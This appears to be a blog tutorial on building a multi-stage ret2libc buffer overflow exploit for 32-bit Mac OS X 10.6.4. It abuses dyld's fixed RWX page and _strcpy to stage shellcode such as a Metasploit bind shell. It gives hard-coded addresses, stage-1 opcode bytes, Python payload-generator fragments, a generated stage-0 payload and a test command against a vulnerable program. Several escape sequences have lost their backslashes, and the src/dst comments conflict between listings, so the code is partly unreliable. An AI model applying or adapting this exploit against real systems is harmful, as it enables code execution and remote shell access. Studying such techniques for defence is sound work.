Talking about buffer overflow exploit on x86, Mac OS X is the most easy and hacker friendly target compare to Linux or Windows. OS X always loads **/usr/lib/dyld **at a fixed location and it contains a lot of helper stubs to launch the exploit. If you want something advanced likes ROP (Return-Oriented-Programming) exploit you may have a look at “Mac OS X Return-Oriented Exploitation” and thorough step-by-step guide “OSX ROP Exploit – EvoCam Case Study“. But actually, we don’t need ROP for 32-bit exploitation on OS X, simple ret2libc is enough and straightforward to implement. Let take a look at multi-stage ret2libc exploit on OS X.
The target
Under OSX, dyld is always loaded at a fixed location with __IMPORT page is RWX as shown below:
__TEXT 8fe00000-8fe0b000 [ 44K] r-x/rwx SM=COW /usr/lib/dyld __TEXT 8fe0b000-8fe0c000 [ 4K] r-x/rwx SM=PRV /usr/lib/dyld __TEXT 8fe0c000-8fe42000 [ 216K] r-x/rwx SM=COW /usr/lib/dyld __LINKEDIT 8fe70000-8fe84000 [ 80K] r--/rwx SM=COW /usr/lib/dyld __DATA 8fe42000-8fe44000 [ 8K] rw-/rwx SM=PRV /usr/lib/dyld __DATA 8fe44000-8fe6f000 [ 172K] rw-/rwx SM=COW /usr/lib/dyld __IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld
Our target is to transfer the desired shellcode to the __IMPORT section of dyld then execute it. We can simply do this with byte-per-byte copy way of ROPEME. There is some disadvantages with this method:
- Payload size is large, around 10 times of actual shellcode
- We have to re-generate the whole payload when changing to new shellcode
With OS X we can do it better as there is a RWX page at static location.
Staging payload
The most complicated part of ROP technique is “stack pivoting” or ESP register control under ASLR. By executing a small shellcode we can take ESP under control easily. Our multi-stage payload will look like:
Stage-2: actual shellcode
This is the last stage in our multi-stage payload. Any NULL-free shellcode can be used, e.g bind shell code from Metasploit.
Stage-1: shellcode loader for stage-2 payload
This stage will transfer stage-2 payload on stack to __IMPORT section (RWX) of dyld then executes it. The transfer function is *_strcpy() *in dyld. Below small shellcode will be executed on RWX page to perform the job:
# 58 pop eax # eax -> TARGET # 5B pop ebx # ebx -> STRCPY # 54 push esp # src -> &shellcode # 50 push eax # dst -> TARGET # 50 push eax # jump to TARGET when return from _strcpy() # 53 push ebx # STRCPY # C3 ret # execute _strcpy(TARGET, &shellcode)
Stage-0: ret2libc loader for stage-1 payload
This stage will transfer 7 bytes of stage-1 payload to our RWX location using repeated *_strcpy() *calls, then executes it. We lookups the dyld for necessary byte values and copy it to the target byte-per-byte.
In summary, there is some advantages with our multi-stage payload:
- Straightforward to implement: only ret2libc calls, no gadget is required
- Payload size overhead is small: around 100 bytes
- Independent, generic loader code: no need to regenerate the whole payload, just append a new shellcode to make new payload
Automated payload generator
Let put all this together and make an automated payload generator in Python.
- Select the target
#__IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld TARGET = 0x8fe6f010 # to avoid NULL byte # dyld base address DYLDADDR = 0x8fe00000
- Extract dyld’s i386 code
# $ otool -f /usr/lib/dyld # ... #architecture 1 # cputype 7 # cpusubtype 3 # capabilities 0x0 # offset 352256 # size 368080 # align 2^12 (4096) # ... DYLDFILE = "/usr/lib/dyld" DYLDCODE = open(DYLDFILE, "rb").read() DYLDCODE = DYLDCODE[352256 : 352256+368080]
- _strcpy() call
# $ nm -arch i386 /usr/lib/dyld | grep _strcpy # 8fe2db10 t _strcpy STRCPY = 0x8fe2db10 # $ otool -arch i386 -tv /usr/lib/dyld | grep pop -A2 | grep ret -B1 | grep pop # 8fe28790 popl %edi # 8fe2b3d4 popl %edi POP2RET = 0x8fe2878f
- stage-1
# stage1 # 58 pop eax # eax -> TARGET # 5B pop ebx # ebx -> STRCPY # 54 push esp # dst -> &shellcode # 50 push eax # src -> TARGET # 50 push eax # jump to TARGET when return from _strcpy() # 53 push ebx # STRCPY # C3 ret # execute _strcpy(TARGET, &shellcode) STAGE1 = "x58x5bx54x50x50x53xc3"
- stage-0
# stage0: _strcpy sequences STAGE0 = gen_stage0(DYLDCODE, STAGE1)
Below is the stage-0 payload loader generated for OS X 10.6.4:
STAGE0 = ( "x10xdbxe2x8fx8fx87xe2x8fx10xf0xe6x8fx31x24xe1x8f" "x10xdbxe2x8fx8fx87xe2x8fx12xf0xe6x8fx32x01xe0x8f" "x10xdbxe2x8fx8fx87xe2x8fx13xf0xe6x8fx7ex21xe1x8f" "x10xdbxe2x8fx8fx87xe2x8fx15xf0xe6x8fx45x10xe0x8f" "x10xdbxe2x8fx8fx87xe2x8fx16xf0xe6x8fx44x10xe0x8f" "x10xf0xe6x8fx10xf0xe6x8fx10xdbxe2x8f" )
Test the payload with simple buffer overflow:
bash-3.2$ ./vuln "`python -c 'print "A"*272 + "x10xdbxe2x8fx8fx87xe2x8fx10xf0xe6x8fx31x24xe1x8fx10xdbxe2x8fx8fx87xe2x8fx12xf0xe6x8fx32x01xe0x8fx10xdbxe2x8fx8fx87xe2x8fx13xf0xe6x8fx7ex21xe1x8fx10xdbxe2x8fx8fx87xe2x8fx15xf0xe6x8fx45x10xe0x8fx10xdbxe2x8fx8fx87xe2x8fx16xf0xe6x8fx44x10xe0x8fx10xf0xe6x8fx10xf0xe6x8fx10xdbxe2x8f" + "xcc"*4'` ... Trace/BPT trap bash-3.2$
Looking for the next? Maybe “Mac OS X ROP exploit on x86_64″ someday.